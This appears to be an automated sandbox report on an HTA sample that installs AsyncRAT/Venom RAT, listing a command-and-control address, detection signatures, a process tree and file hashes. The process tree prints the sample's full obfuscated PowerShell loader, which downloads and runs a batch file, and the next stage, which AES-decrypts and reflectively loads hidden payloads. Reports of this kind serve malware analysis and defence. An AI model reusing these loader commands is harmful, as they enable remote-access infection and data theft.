Analysis
max time kernel: 101s
max time network: 113s
platform: windows10-2004_x64
resource: win10v2004-20240412-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240412-en, locale:en-us, os:windows10-2004-x64, system
submitted: 17-04-2024 01:11
Static task: static1
Behavioral task: behavioral1
Sample: 2522c6e717f20b29f38a73dc450a3ad748a14bbe86796429e50eaa672edd5d23.hta
Resource: win7-20240221-en
General
Target: 2522c6e717f20b29f38a73dc450a3ad748a14bbe86796429e50eaa672edd5d23.hta
Size: 12KB
MD5: 1813054fd92c59be0214e8f908d31155
SHA1: 3666af3fcd4dbf6d4881afb6e80841c87732569b
SHA256: 2522c6e717f20b29f38a73dc450a3ad748a14bbe86796429e50eaa672edd5d23
SHA512: 5416b8eebba6bdc80b48fb5c56e78ffa4c260e13513528022ac5f0e2f0ee5831ce3e8e55b5dbe0aadd60e782b7c69891ffd92190863aa4e218c8a5c5fa966869
SSDEEP: 192:whpDrcs3f1bF0VXd5uQ45pj3PxFtjQp2QYw:wgefH0lC5pTRo
Malware Config
Extracted
asyncrat
Venom RAT + HVNC + Stealer + Grabber v6.0.3
Default
194.48.251.169:4449
wmdekgrrot
delay: 1
install: false
install_folder: %AppData%
Signatures

Async RAT payload (1 IoC)
resource | yara_rule
behavioral2/memory/4636-111-0x0000000007920000-0x0000000007938000-memory.dmp | family_asyncrat

Detects executables attempting to enumerate video devices using WMI (1 IoC)
resource | yara_rule
behavioral2/memory/4636-111-0x0000000007920000-0x0000000007938000-memory.dmp | INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice

Blocklisted process makes network request (3 IoCs)
flow | pid | Process
21 | 4724 | powershell.exe
24 | 4724 | powershell.exe
35 | 4636 | powershell.exe

Checks computer location settings (2 TTPs, 1 IoC)
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-355664440-2199602304-1223909400-1000\Control Panel\International\Geo\Nation | mshta.exe

Drops file in Windows directory (1 IoC)
description | ioc | Process
File created | C:\Windows\AppCompat\Programs\Amcache.hve.tmp | powershell.exe

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Checks processor information in registry (2 TTPs, 6 IoCs)
Processor information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | wermgr.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | EXCEL.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | EXCEL.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | EXCEL.EXE
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | wermgr.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | wermgr.exe

Enumerates system info in registry (2 TTPs, 5 IoCs)
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | EXCEL.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | EXCEL.EXE
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | wermgr.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | wermgr.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | EXCEL.EXE

Modifies registry class (1 IoC)
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-355664440-2199602304-1223909400-1000_Classes\Local Settings | powershell.exe

Suspicious behavior: AddClipboardFormatListener (1 IoC)
pid | Process
1976 | EXCEL.EXE

Suspicious behavior: EnumeratesProcesses (8 IoCs)
pid | Process
4724 | powershell.exe
4724 | powershell.exe
4636 | powershell.exe
4636 | powershell.exe
4400 | powershell.exe
4400 | powershell.exe
4636 | powershell.exe
4636 | powershell.exe

Suspicious use of AdjustPrivilegeToken (6 IoCs)
description | pid | Process
Token: SeDebugPrivilege | 4724 | powershell.exe
Token: SeDebugPrivilege | 4636 | powershell.exe
Token: SeDebugPrivilege | 4400 | powershell.exe
Token: SeRestorePrivilege | 4636 | powershell.exe
Token: SeBackupPrivilege | 4636 | powershell.exe
Token: SeBackupPrivilege | 4636 | powershell.exe

Suspicious use of SetWindowsHookEx (15 IoCs)
pid | Process
1976 | EXCEL.EXE (14 entries)
4636 | powershell.exe (1 entry)

Suspicious use of WriteProcessMemory (24 IoCs; each row below appears three times in the report)
description | pid | Process | procid_target
PID 4472 wrote to memory of 4724 | 4472 | mshta.exe | 85
PID 4724 wrote to memory of 1976 | 4724 | powershell.exe | 92
PID 4724 wrote to memory of 1520 | 4724 | powershell.exe | 97
PID 1520 wrote to memory of 1088 | 1520 | cmd.exe | 99
PID 1088 wrote to memory of 4160 | 1088 | cmd.exe | 101
PID 1088 wrote to memory of 4636 | 1088 | cmd.exe | 102
PID 4636 wrote to memory of 4400 | 4636 | powershell.exe | 103
PID 4636 wrote to memory of 4132 | 4636 | powershell.exe | 104
Processes
(tree order; indentation shows parent/child depth)

C:\Windows\SysWOW64\mshta.exe
  Command line: C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\2522c6e717f20b29f38a73dc450a3ad748a14bbe86796429e50eaa672edd5d23.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
  PID: 4472
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function kECMOkR($gdxSDC, $rTnOMRhfVJUY){[IO.File]::WriteAllBytes($gdxSDC, $rTnOMRhfVJUY)};function mumNyknYLgnsVYB($gdxSDC){if($gdxSDC.EndsWith((LSLyBfLILlsvQ @(74696,74750,74758,74758))) -eq $True){rundll32.exe $gdxSDC }elseif($gdxSDC.EndsWith((LSLyBfLILlsvQ @(74696,74762,74765,74699))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $gdxSDC}elseif($gdxSDC.EndsWith((LSLyBfLILlsvQ @(74696,74759,74765,74755))) -eq $True){misexec /qn /i $gdxSDC}else{Start-Process $gdxSDC}};function sSOuincqeTeMefqK($fusnPVMKKSsamabF){$pXfsSsKiwLgzgmXA = New-Object (LSLyBfLILlsvQ @(74728,74751,74766,74696,74737,74751,74748,74717,74758,74755,74751,74760,74766));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$rTnOMRhfVJUY = $pXfsSsKiwLgzgmXA.DownloadData($fusnPVMKKSsamabF);return $rTnOMRhfVJUY};function LSLyBfLILlsvQ($UyfqAHAWGDk){$PuBEDrZXHzyrm=74650;$kKrEoNdYusFnuk=$Null;foreach($FhWJmOIuouGdHGPQ in $UyfqAHAWGDk){$kKrEoNdYusFnuk+=[char]($FhWJmOIuouGdHGPQ-$PuBEDrZXHzyrm)};return $kKrEoNdYusFnuk};function BWGtGqQvhtaMVCwQIH(){$UpkpLddqWxxLFW = $env:AppData + '\';$NYgAUxsoiyj = $UpkpLddqWxxLFW + 'gogi.xlsx';If(Test-Path -Path $NYgAUxsoiyj){Invoke-Item $NYgAUxsoiyj;}Else{ $YEmOvxcFFlsialH = sSOuincqeTeMefqK (LSLyBfLILlsvQ @(74754,74766,74766,74762,74708,74697,74697,74699,74707,74702,74696,74702,74706,74696,74700,74703,74699,74696,74699,74704,74707,74708,74705,74700,74706,74705,74697,74753,74761,74753,74755,74696,74770,74758,74765,74770));kECMOkR $NYgAUxsoiyj $YEmOvxcFFlsialH;Invoke-Item $NYgAUxsoiyj;};$YJtKgLZ = $UpkpLddqWxxLFW + 'gogis.bat'; if (Test-Path -Path $YJtKgLZ){mumNyknYLgnsVYB $YJtKgLZ;}Else{ $WTNqxG = sSOuincqeTeMefqK (LSLyBfLILlsvQ @(74754,74766,74766,74762,74708,74697,74697,74699,74707,74702,74696,74702,74706,74696,74700,74703,74699,74696,74699,74704,74707,74708,74705,74700,74706,74705,74697,74753,74761,74753,74755,74765,74696,74748,74747,74766));kECMOkR $YJtKgLZ $WTNqxG;mumNyknYLgnsVYB $YJtKgLZ;};;;;}BWGtGqQvhtaMVCwQIH;
    PID: 4724
    - Blocklisted process makes network request
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
      Command line: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Roaming\gogi.xlsx"
      PID: 1976
      - Checks processor information in registry
      - Enumerates system info in registry
      - Suspicious behavior: AddClipboardFormatListener
      - Suspicious use of SetWindowsHookEx

    C:\Windows\SysWOW64\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\gogis.bat" "
      PID: 1520
      - Suspicious use of WriteProcessMemory

      C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\gogis.bat"
        PID: 1088
        - Suspicious use of WriteProcessMemory

        C:\Windows\SysWOW64\cmd.exe
          Command line: C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\gogis.bat';$XgWC='CJCPqopJCPqyToJCPq'.Replace('JCPq', ''),'DeKEVccoKEVcmKEVcpKEVcreKEVcsKEVcsKEVc'.Replace('KEVc', ''),'GeAJwHtCAJwHurrAJwHeAJwHntAJwHProAJwHceAJwHssAJwH'.Replace('AJwH', ''),'CGqtVreGqtVateGqtVDGqtVecrGqtVypGqtVtoGqtVrGqtV'.Replace('GqtV', ''),'TrashffnsfshfforshffmshffFinshffashfflBlshffocshffkshff'.Replace('shff', ''),'LoaAcuudAcuu'.Replace('Acuu', ''),'EnPhDKtPhDKrPhDKyPoPhDKiPhDKntPhDK'.Replace('PhDK', ''),'InvjPegokejPeg'.Replace('jPeg', ''),'ChBNFcangBNFceEBNFcxtBNFcenBNFcsBNFciBNFconBNFc'.Replace('BNFc', ''),'MamJZeimJZenmJZeMomJZedumJZelemJZe'.Replace('mJZe', ''),'SDiPVplDiPViDiPVtDiPV'.Replace('DiPV', ''),'ReZkbLadLZkbLinZkbLeZkbLsZkbL'.Replace('ZkbL', ''),'FBIJjrBIJjomBBIJjaBIJjseBIJj64BIJjStrBIJjiBIJjngBIJj'.Replace('BIJj', ''),'EleFaTTmeFaTTnFaTTtAFaTTtFaTT'.Replace('FaTT', '');powershell -w hidden;function nHhmY($bfNRC){$Wqjzg=[System.Security.Cryptography.Aes]::Create();$Wqjzg.Mode=[System.Security.Cryptography.CipherMode]::CBC;$Wqjzg.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$Wqjzg.Key=[System.Convert]::($XgWC[12])('0/mNfjofNmhTDWKM5pVXBX9kZTvZAJfnb+xHxm0CsMs=');$Wqjzg.IV=[System.Convert]::($XgWC[12])('mimfsJsCvsdSCjq6OJjGsw==');$mEsqN=$Wqjzg.($XgWC[3])();$cIvUt=$mEsqN.($XgWC[4])($bfNRC,0,$bfNRC.Length);$mEsqN.Dispose();$Wqjzg.Dispose();$cIvUt;}function Jxpsl($bfNRC){$DhsxW=New-Object System.IO.MemoryStream(,$bfNRC);$abuYQ=New-Object System.IO.MemoryStream;$hMgwC=New-Object System.IO.Compression.GZipStream($DhsxW,[IO.Compression.CompressionMode]::($XgWC[1]));$hMgwC.($XgWC[0])($abuYQ);$hMgwC.Dispose();$DhsxW.Dispose();$abuYQ.Dispose();$abuYQ.ToArray();}$vXkJe=[System.IO.File]::($XgWC[11])([Console]::Title);$JakZo=Jxpsl (nHhmY ([Convert]::($XgWC[12])([System.Linq.Enumerable]::($XgWC[13])($vXkJe, 5).Substring(2))));$GFnOO=Jxpsl (nHhmY ([Convert]::($XgWC[12])([System.Linq.Enumerable]::($XgWC[13])($vXkJe, 6).Substring(2))));[System.Reflection.Assembly]::($XgWC[5])([byte[]]$GFnOO).($XgWC[6]).($XgWC[7])($null,$null);[System.Reflection.Assembly]::($XgWC[5])([byte[]]$JakZo).($XgWC[6]).($XgWC[7])($null,$null); "
          PID: 4160

        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          PID: 4636
          - Blocklisted process makes network request
          - Drops file in Windows directory
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of SetWindowsHookEx
          - Suspicious use of WriteProcessMemory

          C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
            PID: 4400
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken

          C:\Windows\SysWOW64\wermgr.exe
            Command line: "C:\Windows\system32\wermgr.exe" "-outproc" "0" "4636" "2656" "2248" "2660" "0" "0" "2664" "0" "0" "0" "0" "0"
            PID: 4132
            - Checks processor information in registry
            - Enumerates system info in registry
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 2KB
MD5: 0774a05ce5ee4c1af7097353c9296c62
SHA1: 658ff96b111c21c39d7ad5f510fb72f9762114bb
SHA256: d9c5347ed06755feeb0615f1671f6b91e2718703da0dbc4b0bd205cbd2896dd4
SHA512: 104d69fc4f4aaa5070b78ada130228939c7e01436351166fe51fe2da8a02f9948e6d92dd676f62820da1813872b91411e2f863c9a98a760581ec34d4aa354994

Filesize: 21KB
MD5: dc9e5f0403f2e2c0d8477d0729cde65f
SHA1: 1b77d912997911b6168e6c735b2c2ec8306708f2
SHA256: 77a84a17e6b8cf1d13c4c94d4b9b1dad2503f073ac556e7675a5816257731747
SHA512: e7d1bc29623b78e775e86d372893951c4f66bd9bb34dba3ec0af598deb4e8d7b299de7f8b1c69a481f29ad767c0709cdf5f249224661e7844263c05673d3ce97

Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Filesize: 217B
MD5: 180d791d34efdb265afd0ff4336e9c59
SHA1: 88c9c4b4c1376229fbc516f8552ddda0ee83c1c4
SHA256: 263f24d019a6c20e80f88b7e7b8d9037a3b41f6923eab101c131e82c7a2f47e3
SHA512: fc61aca2d2c56807561ec02480830058c03c8c84ca7301d702b769a9f1061ab21fe321b45868053e945e8e9aa9d264a22d96c0b2b1a1bc22e55baa57dfaf9178

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
Filesize: 24B
MD5: 4fcb2a3ee025e4a10d21e1b154873fe2
SHA1: 57658e2fa594b7d0b99d02e041d0f3418e58856b
SHA256: 90bf6baa6f968a285f88620fbf91e1f5aa3e66e2bad50fd16f37913280ad8228
SHA512: 4e85d48db8c0ee5c4dd4149ab01d33e4224456c3f3e3b0101544a5ca87a0d74b3ccd8c0509650008e2abed65efd1e140b1e65ae5215ab32de6f6a49c9d3ec3ff

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
Filesize: 852B
MD5: d5b5932f04b7997635ea30345c9c4b4e
SHA1: be7b7999d349b5802a38f8595098a55fec5425a2
SHA256: 4f8c5fedf89615f1ed179995df54de5193466b576f77e75eb7ebf2c2edec9c45
SHA512: f1af57a991080abe07a0917e43f4a6dc6d954eaef92e7d678b9e5cf2e5b4f55dd2ed6caa2ce28bb846a556ff8b428ad9f7353fac710fb648b848cdbd048f05ca

Filesize: 9KB
MD5: 600c497f3fe2e8ce045dc56ee1edca75
SHA1: 02fc342d23e3e49c9811592922beb1e4f7d3cfc1
SHA256: 1235db2b5033bed11ce0586dabd7122f4bab90eb2a4b65a81bba8b884d9c11ed
SHA512: ef4a7ad833ea2d7ea0a9b618aee52849e53044d72b737c79e07563ea23d4e181ab5285cc6c7b10e9e18d019d0ea607810d2306e497f394c6ccc1814b3e305809

Filesize: 6.9MB
MD5: a65e873839228c5b453d6effa5d14d16
SHA1: 40be429e0e6b41061f3291d10e720eaebf32eda1
SHA256: 59c388b975d290fa525ffefe5aaecb011219ebd3121a7e79e913d980fb7af951
SHA512: 84ec1da7d5f5fe236c7fbe960b69d99ae0b6d3fe83844cd2bf3128508d39ad1de35f17dcb101e06fb25b155a806885bb5d6d095fbf3e0a3c729c678fa200f850